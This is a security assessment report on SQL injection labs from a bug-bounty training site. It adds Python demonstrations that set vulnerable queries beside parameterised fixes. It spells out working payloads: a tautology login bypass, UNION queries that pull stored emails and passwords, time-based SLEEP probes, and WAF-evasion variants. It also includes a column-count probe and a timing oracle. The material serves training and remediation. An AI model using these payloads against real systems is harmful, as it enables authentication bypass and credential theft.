Introduction
This report describes the proceedings and results of a Black Box security
assessment conducted against the Week 9 Labs. It lists the findings and the
corresponding best-practice mitigation actions and recommendations.
1. Objective
The objective of the assessment was to uncover vulnerabilities in the Week 9 Labs and to
deliver a final security assessment report comprising the vulnerabilities found, a remediation
strategy and recommendation guidelines to help mitigate the vulnerabilities and risks identified
during the activity.
2. Scope
This section defines the scope and boundaries of the project.
3. Summary
Outlined below is a Black Box application security assessment of the Week 9 Labs.
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
Generic SQL injection payloads
How It Was Discovered
Automated tools and manual injection of basic SQL payloads into the given parameters
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_1/lab_1.php
Consequences of not Fixing the Issue
Can lead to leakage of user credentials and account takeover
Suggested Countermeasures
Build queries with parameterised statements instead of concatenating request parameters into SQL; validate and sanitise input parameters and URL values as an additional layer
References
https://drive.google.com/file/d/1fOVWwPEWJr7mp6zFys2Tad8SrDcyNHQM/view
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
1.2. Strings & Errors Part 2!
Reference: Strings & Errors Part 2!
Risk Rating: Low
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
Generic SQL injection payloads (comment truncation)
How It Was Discovered
Automated tools and the manual payload id=1# (in MySQL, # starts a comment, so the remainder of the original query is discarded)
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_2/lab_2.php
Consequences of not Fixing the Issue
Can lead to database exploitation and leakage of user data and credentials
Suggested Countermeasures
Parameterised database queries; validation and filtering of user input
References
https://drive.google.com/file/d/1fOVWwPEWJr7mp6zFys2Tad8SrDcyNHQM/view
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
Generic SQL injection payloads
How It Was Discovered
Automated tools and a basic SQL query payload
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_3/lab_3.php
Consequences of not Fixing the Issue
Can lead to exposure of user or administrator data
Suggested Countermeasures
Parameterised queries; validation of the user input taken from the URL
References
https://owasp.org/www-community/attacks/SQL_Injection
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
Generic error-based payloads; authentication bypass with a tautology in the login form
How It Was Discovered
Automated tools and the payload ' OR '1'='1 submitted in both the email and password fields
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_7/lab_7.php
Consequences of not Fixing the Issue
Authentication bypass, credential exposure, sensitive data retrieval and account takeover
Suggested Countermeasures
Parameterised queries for the login lookup, with the password verified against a stored hash rather than inside the SQL WHERE clause; proper input validation so that attacker-supplied SQL is never executed
References
https://portswigger.net/web-security/sql-injection
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
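The two injection patterns reported so far (the comment-truncated id parameter of labs 1 to 3 and the tautology login bypass of lab 7) and the parameterised fix recommended for them, as an added example that is not part of the original report or of the lab code. It assumes an in-memory SQLite database with constructed sample users in place of the lab's MySQL backend, so the comment terminator is -- rather than the # used in the lab payload; the function names (lookup_vulnerable, login_fixed, and so on) are hypothetical.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample data standing in for the lab database (not the lab's real schema).
# Passwords are stored twice: in the clear, as the lab-style login query expects, and as a
# PBKDF2 hash, which is what the hardened login compares against.
SALT = b"demo-salt"  # a real system uses a random per-user salt; fixed here to keep the example short
USERS = [
    (1, "alice", "alice@example.com", "s3cret-alice"),
    (2, "bob", "bob@example.com", "s3cret-bob"),
    (3, "admin", "admin@example.com", "s3cret-admin"),
]


def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 50_000).hex()


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, email TEXT, password TEXT, pw_hash TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)",
                     [(i, n, e, p, pw_hash(p)) for i, n, e, p in USERS])
    return conn


# --- labs 1-3: a GET parameter pasted straight into the query text ---------------------

def lookup_vulnerable(conn, user_id):
    """Lab-style lookup. Returns the rows, or (as in the 'Strings & Errors' labs)
    the raw database error, which tells the attacker how the query is built."""
    try:
        return conn.execute(f"SELECT id, name, email FROM users WHERE id = {user_id}").fetchall()
    except sqlite3.Error as exc:
        return f"DB error: {exc}"


def lookup_fixed(conn, user_id):
    """Hardened lookup: enforce the type, bind the value, and never echo the DB error."""
    try:
        uid = int(user_id)  # an id is a number; anything else is rejected before SQL exists
    except ValueError:
        return []
    return conn.execute("SELECT id, name, email FROM users WHERE id = ?", (uid,)).fetchall()


# --- lab 7: login form with ' OR '1'='1 in both the email and password fields ----------

def login_vulnerable(conn, email, password):
    """Lab-style login: both fields are concatenated into the WHERE clause, so a tautology
    makes it true for every row and the first user in the table is 'logged in'."""
    q = f"SELECT id, name FROM users WHERE email = '{email}' AND password = '{password}'"
    return conn.execute(q).fetchone()


def login_fixed(conn, email, password):
    """Hardened login: parameterised lookup by email, then a constant-time hash comparison
    in application code, so the password never becomes part of the SQL text."""
    row = conn.execute("SELECT id, name, pw_hash FROM users WHERE email = ?", (email,)).fetchone()
    if row is None or not hmac.compare_digest(row[2], pw_hash(password)):
        return None
    return row[:2]


if __name__ == "__main__":
    conn = make_db()
    # MySQL accepts '#' as a line comment (the lab payload id=1#); SQLite only '--', used here.
    print(lookup_vulnerable(conn, "1 OR 1=1 --"))   # every user, not just id 1
    print(lookup_vulnerable(conn, "1'"))            # raw error text leaks the query structure
    print(lookup_fixed(conn, "1 OR 1=1 --"))        # [] : rejected before any query is built
    print(login_vulnerable(conn, "' OR '1'='1", "' OR '1'='1"))  # logged in as the first row
    print(login_fixed(conn, "' OR '1'='1", "' OR '1'='1"))       # None
    print(login_fixed(conn, "bob@example.com", "s3cret-bob"))    # (2, 'bob')
```

The hardened login deliberately looks up by email only and checks the password outside the database: even with a bound parameter, putting the password into the WHERE clause means a database that stores hashes must be sent the hash, and a database that stores clear text is the problem in itself.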
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
SQL injection using UNION
How It Was Discovered
Automated tools and a UNION payload in the User-Agent header, used to retrieve the data of other ids
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_8/lab_8.php
Consequences of not Fixing the Issue
Sensitive data retrieval, credential leakage and subsequent account takeover
Suggested Countermeasures
Treat the User-Agent header as untrusted input like any form field: use parameterised queries wherever it is stored or looked up, and validate it, so that injected SQL is never executed
References
https://portswigger.net/web-security/sql-injection
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
SQL injection using UNION
How It Was Discovered
Automated tools and a UNION payload in the Referer header (the HTTP header is spelled Referer), used to retrieve the data of other ids
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_9/lab_9.php
Consequences of not Fixing the Issue
Sensitive data retrieval, credential leakage and subsequent account takeover
Suggested Countermeasures
Treat the Referer header as untrusted input like any form field: use parameterised queries wherever it is stored or looked up, and validate it, so that injected SQL is never executed
References
https://owasp.org/www-community/attacks/SQL_Injection
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
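The UNION technique of labs 8 and 9, carried through both headers, as an added example that is not part of the original report or of the lab code. It assumes a constructed SQLite schema in which a visit-tracking query compares the User-Agent and Referer headers against a visits table, and a separate users table holding the data the attacker wants; the column-count discovery step (UNION SELECT NULL,... until the database stops complaining) is the usual preparation for a UNION payload and is shown here because the report does not spell it out. All function names are hypothetical.

```python
import sqlite3

# Constructed sample data; not the lab's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, email TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice@example.com', 's3cret-alice'),
                                 (2, 'admin@example.com', 's3cret-admin');
        CREATE TABLE visits (id INTEGER, agent TEXT, referer TEXT);
        INSERT INTO visits VALUES (1, 'Mozilla/5.0', 'https://example.com/');
    """)
    return conn


def visits_vulnerable(conn, headers):
    """Lab-style tracking lookup: both header values are concatenated into the SELECT.
    Request headers are attacker-controlled input exactly like a form field."""
    ua = headers.get("User-Agent", "")
    ref = headers.get("Referer", "")
    q = f"SELECT id, agent, referer FROM visits WHERE agent = '{ua}' AND referer = '{ref}'"
    try:
        return conn.execute(q).fetchall()
    except sqlite3.Error as exc:
        return f"DB error: {exc}"  # the error message is the oracle for column counting


def visits_fixed(conn, headers):
    """Hardened version: the header values are bound, so a UNION in them is just text."""
    ua = headers.get("User-Agent", "")
    ref = headers.get("Referer", "")
    return conn.execute("SELECT id, agent, referer FROM visits WHERE agent = ? AND referer = ?",
                        (ua, ref)).fetchall()


def find_column_count(inject, max_cols=8):
    """Attacker's first step: a UNION only works when both SELECTs have the same number of
    columns, so try UNION SELECT NULL, NULL,NULL, ... until the request stops erroring."""
    for n in range(1, max_cols + 1):
        payload = "' UNION SELECT " + ",".join(["NULL"] * n) + "-- "
        if not isinstance(inject({"User-Agent": payload}), str):
            return n
    return None


# Once the count is known (3 here), the same payload works in either header.
UNION_PAYLOAD = "' UNION SELECT id, email, password FROM users-- "

if __name__ == "__main__":
    conn = make_db()
    print(find_column_count(lambda h: visits_vulnerable(conn, h)))        # 3
    print(visits_vulnerable(conn, {"User-Agent": UNION_PAYLOAD}))       # users table rows (lab 8)
    print(visits_vulnerable(conn, {"Referer": UNION_PAYLOAD}))          # same via Referer (lab 9)
    print(visits_fixed(conn, {"User-Agent": UNION_PAYLOAD}))            # []
```

The column-count probe is why the report's countermeasure must not be a keyword blacklist: the probing payloads contain nothing but UNION, SELECT and NULL, and a filter that blocks those words wholesale also breaks legitimate browser strings that happen to contain them.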
1.10. Oh Cookies!
Reference: Oh, Cookies!
Risk Rating: High
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
Time-based, error-based and blind SQL injection through a cookie value
How It Was Discovered
Automated tools and the payload %27UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5)--%20 (URL-decoded: 'UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- ) placed in the cookie
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_10/lab_10.php
Consequences of not Fixing the Issue
Sensitive data retrieved (database version, database user and host, and from there stored credentials), a measurable time delay confirming blind injection, account takeover, and further
privilege escalation up to server and database takeover
Suggested Countermeasures
Parameterised queries for every input, cookies included; proper session timeout and cookie invalidation;
ensure that malicious SQL can never be executed
References
https://github.com/payloadbox/sql-injection-payload-list and https://portswigger.net/web-security/sql-injection/blind
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
Time-based blind SQL injection with WAF bypass
How It Was Discovered
Automated tools and the payload ?id=2%27UNION%20SELECT%201,2,SLEEP(5)--%20- (URL-decoded: ?id=2'UNION SELECT 1,2,SLEEP(5)-- -)
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_11/lab_11.php
Consequences of not Fixing the Issue
WAF bypass; leakage of user or administrator credentials through time-based blind injection; depending on the privileges of the database account, possible command execution on the database server
Suggested Countermeasures
Parameterised queries in every input path; treat the WAF as defence in depth rather than the primary control, since a blacklist of
known payloads was bypassed here
References
https://github.com/payloadbox/sql-injection-payload-list and https://portswigger.net/web-security/sql-injection/blind/lab-time-delays
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
Tools Used
Burp Suite & SQLi payloads
Vulnerability Description
Time-based blind SQL injection with WAF bypass
How It Was Discovered
Automated tools and the payload ?id=2")%20union%20select%201,sleep(5),8--+ (URL-decoded: ?id=2") union select 1,sleep(5),8-- , the + decoding to a space; the ") closes a quoted and parenthesised expression, which is why the lab 11 payload did not work here)
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_12/lab_12.php
Consequences of not Fixing the Issue
WAF bypass; leakage of user or administrator credentials through time-based blind injection; depending on the privileges of the database account, possible command execution on the database server
Suggested Countermeasures
Parameterised queries in every input path; treat the WAF as defence in depth rather than the primary control, since a blacklist of
known payloads was bypassed here
References
https://github.com/payloadbox/sql-injection-payload-list and https://portswigger.net/web-security/sql-injection/blind/lab-time-delays
Proof of Concept
This section contains the proof of the above vulnerability, as a screenshot of the lab.
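The time-based blind technique of labs 10 to 12, including the timing comparison that turns a SLEEP() payload into a yes/no oracle, as an added example that is not part of the original report or of the lab code. It assumes a constructed SQLite database in which a URL-encoded cookie value is looked up in a users table, with MySQL's SLEEP() emulated by a registered Python function and sqlite_version() standing in for @@VERSION; the cookie parser, the is_time_injectable check and all other names are hypothetical.

```python
import sqlite3
import time
from urllib.parse import unquote


def make_db():
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); this emulates MySQL's SLEEP(seconds) for the demonstration.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "user"), (2, "admin", "admin")])  # constructed sample rows
    return conn


def parse_cookies(header):
    """Minimal Cookie header parser ('a=b; c=d'); values are URL-decoded, which is how the
    lab's %27 and %20 become the quote and spaces the database actually sees."""
    jar = {}
    for part in header.split(";"):
        if "=" in part:
            k, v = part.strip().split("=", 1)
            jar[k] = unquote(v)
    return jar


def profile_vulnerable(conn, cookie_header):
    """Lab-style profile lookup: the decoded cookie value is concatenated into the query."""
    name = parse_cookies(cookie_header).get("user", "")
    try:
        return conn.execute(f"SELECT id, name, role FROM users WHERE name = '{name}'").fetchall()
    except sqlite3.Error as exc:
        return f"DB error: {exc}"


def profile_fixed(conn, cookie_header):
    """Hardened lookup: the cookie value is bound, so SLEEP() is never evaluated."""
    name = parse_cookies(cookie_header).get("user", "")
    return conn.execute("SELECT id, name, role FROM users WHERE name = ?", (name,)).fetchall()


def timed(fn, *args):
    t0 = time.perf_counter()
    result = fn(*args)
    return result, time.perf_counter() - t0


def is_time_injectable(handler, conn, delay=0.3, baseline_cookie="user=alice"):
    """Time-based blind check: a baseline request against one carrying SLEEP(delay).
    A response slower by roughly the requested delay means the injected SQL ran, even if
    the page itself shows nothing, which is what makes the injection 'blind'."""
    _, base = timed(handler, conn, baseline_cookie)
    payload = f"user=alice'%20UNION%20ALL%20SELECT%20sqlite_version(),'x',SLEEP({delay})--%20"
    _, slow = timed(handler, conn, payload)
    return slow - base >= delay * 0.8  # tolerance for scheduling jitter


if __name__ == "__main__":
    conn = make_db()
    print(is_time_injectable(profile_vulnerable, conn))  # True: the delay is observable
    print(is_time_injectable(profile_fixed, conn))       # False: the payload stayed a string
    # The same UNION ALL also returns data in-band when the page shows it (lab 10):
    print(profile_vulnerable(conn, "user=alice'%20UNION%20ALL%20SELECT%20sqlite_version(),'x',SLEEP(0)--%20"))
    print(profile_fixed(conn, "session=abc; user=admin"))  # a normal cookie still works
```

The 0.8 tolerance factor and a repeated measurement are what keep the check usable over a real network; the comment terminator does not matter to it, so the -- -, --+ and -- variants used in labs 11 and 12 to evade the WAF all produce the same delay.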